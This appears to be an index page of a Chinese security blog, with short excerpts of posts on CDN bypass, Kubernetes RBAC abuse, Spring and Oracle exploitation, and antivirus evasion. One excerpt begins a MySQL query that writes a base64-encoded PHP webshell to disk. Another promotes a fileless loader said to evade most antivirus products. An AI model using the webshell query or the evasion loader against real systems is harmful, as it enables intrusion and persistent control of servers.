绕过CDN寻找网站真实IP地址技巧
CDN简介 CDN,即Content Delivery Network,是一个构建在现有网络基础之上的智能虚拟网络。它依托部署在各地的边缘服务器,并通过中心平台的负载均衡、内容分发和调度等功能模块,使用户可以就...
会员专属
K8S API访问控制之RBAC利用
API访问控制 K8S的API访问控制就是,通过如kubectl、构造REST请求,去访问Kubernetes的API,当请求到达API时经历的多个阶段就是k8s的API访问控制,而RBAC就是其中鉴权的部分,并且是现在的主要...
mysql写冰蝎马
select '<?php file_put_contents('abab.php',base64_decode('Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0l...
免杀技术 – FilelessPELoader 免杀加载
FilelessPELoader 免杀加载 分享一个好用的 PE 远程加载项目 https://github.com/TheD1rkMtr/FilelessPELoader 远程内存加载,免杀大部分的杀软 1、首先安装相关 python 库 pip install pycrypt...
漏洞复现 – Spring core rce 排坑小结
仅作为漏洞复现进行学习,切勿对网站进行非法测试,由于漏洞存在较大危害性,截图均进行打码操作 漏洞描述 Spring core 是 Spring 系列产品中用来负责发现、创建并处理 bean 之间的关系的一个工...
记一次Oracle注入漏洞提权的艰难过程
Part1 前言 大家好,我是ABC_123。前不久遇到一个Oracle注入漏洞,是搜索型的盲注漏洞,只能用折半法一个字符一个字符的猜解数据,使用sqlmap可以直接跑出来,经过判断是DBA权限。...
漏洞复现-XVE-2023-23744
一:漏洞描述 通天星CMSV6拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监...
